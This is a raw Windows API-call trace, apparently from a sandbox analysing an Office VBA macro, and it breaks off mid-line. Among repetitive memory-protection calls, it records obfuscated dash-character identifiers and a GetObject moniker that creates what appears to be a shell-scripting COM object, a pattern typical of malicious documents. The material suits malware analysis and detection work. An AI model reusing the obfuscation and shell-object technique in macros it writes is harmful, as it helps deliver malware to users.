1 [0117.073] GetCurrentProcess () returned 0xffffffff [0117.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0117.073] GetCurrentProcess () returned 0xffffffff [0117.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0117.073] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.073] GetCurrentProcess () returned 0xffffffff [0117.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0117.073] GetCurrentProcess () returned 0xffffffff [0117.073] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0117.073] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.074] GetCurrentProcess () returned 0xffffffff [0117.074] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0117.074] GetCurrentProcess () returned 0xffffffff [0117.074] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0117.074] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.074] GetCurrentProcess () returned 0xffffffff [0117.074] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0117.074] GetCurrentProcess () returned 0xffffffff [0117.074] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0117.074] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.075] GetCurrentProcess () returned 0xffffffff [0117.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0117.075] GetCurrentProcess () returned 0xffffffff [0117.075] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0117.075] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975cc | out: lpflOldProtect=0x1975cc*=0x40) returned 1 [0117.076] GetCurrentProcess () returned 0xffffffff [0117.076] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0117.078] GetAsyncKeyState (vKey=3) returned 0 [0117.078] GetAsyncKeyState (vKey=3) returned 0 [0117.078] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.078] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.078] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.078] VarCmp (pvarLeft=0x197d34, pvarRight=0x197d24, lcid=0x0, dwFlags=0x30001) returned 0x1 [0117.079] CRetailMalloc_Alloc () returned 0xcb7af00 [0117.079] memcpy (in: _Dst=0xd015168, _Src=0x197468, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.079] memcpy (in: _Dst=0xd015270, _Src=0x197484, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0117.079] memcpy (in: _Dst=0xd015168, _Src=0x197468, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302ebe, cbMultiByte=10, lpWideCharStr=0x197284, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0117.080] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0702, cbMultiByte=10, lpWideCharStr=0x1972e4, cchWideChar=11 | out: lpWideCharStr="GetObject") returned 10 [0117.080] memcpy (in: _Dst=0xd015168, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.080] memcpy (in: _Dst=0xd015168, _Src=0x197468, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.080] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0117.081] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0117.081] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0117.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302ee6, cbMultiByte=27, lpWideCharStr=0x197284, cchWideChar=28 | out: lpWideCharStr="––——–———–—––––——––—–––—––—") returned 27 [0117.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c06ca, cbMultiByte=27, lpWideCharStr=0x1972e4, cchWideChar=28 | out: lpWideCharStr="––——–———–—––––——––—–––—––—") returned 27 [0117.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c06ca, cbMultiByte=27, lpWideCharStr=0x1972e4, cchWideChar=28 | out: lpWideCharStr="––——–———–—––––——––—–––—––—") returned 27 [0117.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c06ca, cbMultiByte=27, lpWideCharStr=0x1972e4, cchWideChar=28 | out: lpWideCharStr="––——–———–—––––——––—–––—––—") returned 27 [0117.084] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x96\x97\x96\x96\x96\x97\x97\x96\x97\x96\x97\x96\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0117.084] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x97\x96\x97\x97\x97\x97\x96\x96\x97\x96\x97\x96\x96\x97\x96\x96\x97\x97\x96\x96\x97\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0117.084] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0117.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c06ca, cbMultiByte=27, lpWideCharStr=0x1972e4, cchWideChar=28 | out: lpWideCharStr="––——–———–—––––——––—–––—––—") returned 27 [0117.084] CRetailMalloc_Alloc () returned 0xc877908 [0117.084] _mbscpy_s (in: _Dst=0xc877908, _DstSizeInBytes=0x1b, _Src=0x112c06ca | out: _Dst=0xc877908) returned 0x0 [0117.084] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_\x97\x97\x96\x96\x97\x97\x97\x97\x97\x97\x96\x96\x97\x96\x96\x96\x97\x97\x96\x96\x97\x97\x96\x96\x97\x97", cchCount1=-1, lpString2="_B_var_\x96\x96\x97\x97\x96\x97\x97\x97\x96\x97\x96\x96\x96\x96\x97\x97\x96\x96\x97\x96\x96\x96\x97\x96\x96\x97", cchCount2=-1) returned 3 [0117.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0c5a, cbMultiByte=34, lpWideCharStr=0x1972f4, cchWideChar=35 | out: lpWideCharStr="_B_var_––——–———–—––––——––—–––—––—") returned 34 [0117.085] _mbscpy_s (in: _Dst=0x19735c, _DstSizeInBytes=0x1b, _Src=0x112c06ca | out: _Dst=0x19735c) returned 0x0 [0117.085] CRetailMalloc_Free () returned 0x1 [0117.085] memcpy (in: _Dst=0xd015270, _Src=0xd015270, _Size=0xc | out: _Dst=0xd015270) returned 0xd015270 [0117.085] memcpy (in: _Dst=0xd015168, _Src=0x197468, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.085] memcpy (in: _Dst=0xd01516c, _Src=0x197468, _Size=0x4 | out: _Dst=0xd01516c) returned 0xd01516c [0117.085] memcpy (in: _Dst=0xd015168, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.085] memcpy (in: _Dst=0xd015168, _Src=0x1972d4, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.085] memcpy (in: _Dst=0xd015168, _Src=0x197468, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.085] memcpy (in: _Dst=0xd015168, _Src=0x197468, _Size=0x4 | out: _Dst=0xd015168) returned 0xd015168 [0117.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0117.090] memcpy (in: _Dst=0xcb7af80, _Src=0x197504, _Size=0x18 | out: _Dst=0xcb7af80) returned 0xcb7af80 [0117.090] CRetailMalloc_Realloc () returned 0xcb7af00 [0117.090] CRetailMalloc_Free () returned 0x1 [0117.090] GetCurrentProcess () returned 0xffffffff [0117.090] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601714, dwSize=0x14) returned 1 [0117.090] VirtualProtect (in: lpAddress=0xf601714, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.091] GetCurrentProcess () returned 0xffffffff [0117.091] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601715, dwSize=0x2) returned 1 [0117.091] GetCurrentProcess () returned 0xffffffff [0117.091] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601734, dwSize=0x14) returned 1 [0117.091] VirtualProtect (in: lpAddress=0xf601734, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.095] GetCurrentProcess () returned 0xffffffff [0117.095] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601735, dwSize=0x2) returned 1 [0117.095] GetCurrentProcess () returned 0xffffffff [0117.095] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601754, dwSize=0x14) returned 1 [0117.095] VirtualProtect (in: lpAddress=0xf601754, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.096] GetCurrentProcess () returned 0xffffffff [0117.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601755, dwSize=0x2) returned 1 [0117.096] GetCurrentProcess () returned 0xffffffff [0117.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601774, dwSize=0x14) returned 1 [0117.096] VirtualProtect (in: lpAddress=0xf601774, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.096] GetCurrentProcess () returned 0xffffffff [0117.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601775, dwSize=0x2) returned 1 [0117.096] GetCurrentProcess () returned 0xffffffff [0117.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601794, dwSize=0x14) returned 1 [0117.096] VirtualProtect (in: lpAddress=0xf601794, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.097] GetCurrentProcess () returned 0xffffffff [0117.097] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601795, dwSize=0x2) returned 1 [0117.097] GetCurrentProcess () returned 0xffffffff [0117.097] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b4, dwSize=0x14) returned 1 [0117.097] VirtualProtect (in: lpAddress=0xf6017b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.102] GetCurrentProcess () returned 0xffffffff [0117.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017b5, dwSize=0x2) returned 1 [0117.102] GetCurrentProcess () returned 0xffffffff [0117.102] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d4, dwSize=0x14) returned 1 [0117.102] VirtualProtect (in: lpAddress=0xf6017d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.116] GetCurrentProcess () returned 0xffffffff [0117.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017d5, dwSize=0x2) returned 1 [0117.116] GetCurrentProcess () returned 0xffffffff [0117.116] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f4, dwSize=0x14) returned 1 [0117.117] VirtualProtect (in: lpAddress=0xf6017f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.120] GetCurrentProcess () returned 0xffffffff [0117.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf6017f5, dwSize=0x2) returned 1 [0117.120] GetCurrentProcess () returned 0xffffffff [0117.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601814, dwSize=0x14) returned 1 [0117.122] VirtualProtect (in: lpAddress=0xf601814, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.124] GetCurrentProcess () returned 0xffffffff [0117.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601815, dwSize=0x2) returned 1 [0117.124] GetCurrentProcess () returned 0xffffffff [0117.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601834, dwSize=0x14) returned 1 [0117.124] VirtualProtect (in: lpAddress=0xf601834, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.125] GetCurrentProcess () returned 0xffffffff [0117.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601835, dwSize=0x2) returned 1 [0117.125] GetCurrentProcess () returned 0xffffffff [0117.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601854, dwSize=0x14) returned 1 [0117.125] VirtualProtect (in: lpAddress=0xf601854, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.125] GetCurrentProcess () returned 0xffffffff [0117.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601855, dwSize=0x2) returned 1 [0117.125] GetCurrentProcess () returned 0xffffffff [0117.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601874, dwSize=0x14) returned 1 [0117.125] VirtualProtect (in: lpAddress=0xf601874, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.126] GetCurrentProcess () returned 0xffffffff [0117.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf601875, dwSize=0x2) returned 1 [0117.126] GetCurrentProcess () returned 0xffffffff [0117.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0048, dwSize=0x14) returned 1 [0117.126] VirtualProtect (in: lpAddress=0xf5d0048, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.127] GetCurrentProcess () returned 0xffffffff [0117.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0049, dwSize=0x2) returned 1 [0117.127] GetCurrentProcess () returned 0xffffffff [0117.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0068, dwSize=0x14) returned 1 [0117.127] VirtualProtect (in: lpAddress=0xf5d0068, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.127] GetCurrentProcess () returned 0xffffffff [0117.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0069, dwSize=0x2) returned 1 [0117.127] GetCurrentProcess () returned 0xffffffff [0117.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0088, dwSize=0x14) returned 1 [0117.127] VirtualProtect (in: lpAddress=0xf5d0088, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.128] GetCurrentProcess () returned 0xffffffff [0117.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0089, dwSize=0x2) returned 1 [0117.128] GetCurrentProcess () returned 0xffffffff [0117.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a8, dwSize=0x14) returned 1 [0117.128] VirtualProtect (in: lpAddress=0xf5d00a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.129] GetCurrentProcess () returned 0xffffffff [0117.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00a9, dwSize=0x2) returned 1 [0117.129] GetCurrentProcess () returned 0xffffffff [0117.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c8, dwSize=0x14) returned 1 [0117.129] VirtualProtect (in: lpAddress=0xf5d00c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.129] GetCurrentProcess () returned 0xffffffff [0117.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00c9, dwSize=0x2) returned 1 [0117.129] GetCurrentProcess () returned 0xffffffff [0117.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e8, dwSize=0x14) returned 1 [0117.129] VirtualProtect (in: lpAddress=0xf5d00e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.130] GetCurrentProcess () returned 0xffffffff [0117.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d00e9, dwSize=0x2) returned 1 [0117.130] GetCurrentProcess () returned 0xffffffff [0117.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0108, dwSize=0x14) returned 1 [0117.130] VirtualProtect (in: lpAddress=0xf5d0108, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.130] GetCurrentProcess () returned 0xffffffff [0117.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0109, dwSize=0x2) returned 1 [0117.130] GetCurrentProcess () returned 0xffffffff [0117.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0128, dwSize=0x14) returned 1 [0117.130] VirtualProtect (in: lpAddress=0xf5d0128, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.131] GetCurrentProcess () returned 0xffffffff [0117.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0129, dwSize=0x2) returned 1 [0117.131] GetCurrentProcess () returned 0xffffffff [0117.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0148, dwSize=0x14) returned 1 [0117.131] VirtualProtect (in: lpAddress=0xf5d0148, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.131] GetCurrentProcess () returned 0xffffffff [0117.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0149, dwSize=0x2) returned 1 [0117.131] GetCurrentProcess () returned 0xffffffff [0117.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0168, dwSize=0x14) returned 1 [0117.131] VirtualProtect (in: lpAddress=0xf5d0168, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.132] GetCurrentProcess () returned 0xffffffff [0117.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0169, dwSize=0x2) returned 1 [0117.132] GetCurrentProcess () returned 0xffffffff [0117.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0188, dwSize=0x14) returned 1 [0117.132] VirtualProtect (in: lpAddress=0xf5d0188, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.132] GetCurrentProcess () returned 0xffffffff [0117.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0189, dwSize=0x2) returned 1 [0117.132] GetCurrentProcess () returned 0xffffffff [0117.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a8, dwSize=0x14) returned 1 [0117.132] VirtualProtect (in: lpAddress=0xf5d01a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.133] GetCurrentProcess () returned 0xffffffff [0117.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01a9, dwSize=0x2) returned 1 [0117.133] GetCurrentProcess () returned 0xffffffff [0117.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c8, dwSize=0x14) returned 1 [0117.133] VirtualProtect (in: lpAddress=0xf5d01c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.134] GetCurrentProcess () returned 0xffffffff [0117.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01c9, dwSize=0x2) returned 1 [0117.134] GetCurrentProcess () returned 0xffffffff [0117.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e8, dwSize=0x14) returned 1 [0117.134] VirtualProtect (in: lpAddress=0xf5d01e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.134] GetCurrentProcess () returned 0xffffffff [0117.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d01e9, dwSize=0x2) returned 1 [0117.134] GetCurrentProcess () returned 0xffffffff [0117.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0208, dwSize=0x14) returned 1 [0117.134] VirtualProtect (in: lpAddress=0xf5d0208, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.135] GetCurrentProcess () returned 0xffffffff [0117.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0209, dwSize=0x2) returned 1 [0117.135] GetCurrentProcess () returned 0xffffffff [0117.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0228, dwSize=0x14) returned 1 [0117.135] VirtualProtect (in: lpAddress=0xf5d0228, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.135] GetCurrentProcess () returned 0xffffffff [0117.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5d0229, dwSize=0x2) returned 1 [0117.136] GetCurrentProcess () returned 0xffffffff [0117.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4868, dwSize=0x14) returned 1 [0117.136] VirtualProtect (in: lpAddress=0xc8b4868, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.136] GetCurrentProcess () returned 0xffffffff [0117.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4869, dwSize=0x2) returned 1 [0117.136] GetCurrentProcess () returned 0xffffffff [0117.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4888, dwSize=0x14) returned 1 [0117.136] VirtualProtect (in: lpAddress=0xc8b4888, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.137] GetCurrentProcess () returned 0xffffffff [0117.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b4889, dwSize=0x2) returned 1 [0117.137] GetCurrentProcess () returned 0xffffffff [0117.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a8, dwSize=0x14) returned 1 [0117.137] VirtualProtect (in: lpAddress=0xc8b48a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0117.137] GetCurrentProcess () returned 0xffffffff [0117.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc8b48a9, dwSize=0x2) returned 1 [0117.137] SetErrorMode (uMode=0x8001) returned 0x8001 [0117.138] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0117.138] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0117.138] SetErrorMode (uMode=0x8001) returned 0x8001 [0117.139] GetProcAddress (hModule=0x693e0000, lpProcName=0x272) returned 0x695d533a [0117.150] GetAsyncKeyState (vKey=3) returned 0 [0117.151] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.151] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.156] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.156] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0117.157] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0117.174] CreateBindCtx (in: reserved=0x0, ppbc=0x1977f8 | out: ppbc=0x1977f8*=0xcb39190) returned 0x0 [0117.176] MkParseDisplayName (in: pbc=0xcb39190, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x1977fc, ppmk=0x197800 | out: pchEaten=0x1977fc, ppmk=0x197800*=0xcb38cd0) returned 0x0 [0118.961] IUnknown:Release (This=0xcb39190) returned 0x0 [0118.961] BindMoniker (in: pmk=0xcb38cd0, grfOpt=0x0, iidResult=0x695f8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x1977f4 | out: ppvResult=0x1977f4*=0x8cec54c) returned 0x0 [0119.811] IUnknown:Release (This=0xcb38cd0) returned 0x0 [0119.811] GetAsyncKeyState (vKey=3) returned 0 [0119.829] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197b9c | out: ppsaOut=0x197b9c) returned 0x0 [0119.829] SafeArrayAllocData (psa=0xc877918) returned 0x0 [0119.844] SafeArrayDestroyData (psa=0xc877918) returned 0x0 [0119.844] SafeArrayDestroyDescriptor (psa=0xc877918) returned 0x0 [0119.850] SetErrorMode (uMode=0x8001) returned 0x8001 [0119.850] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0119.850] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0119.851] SetErrorMode (uMode=0x8001) 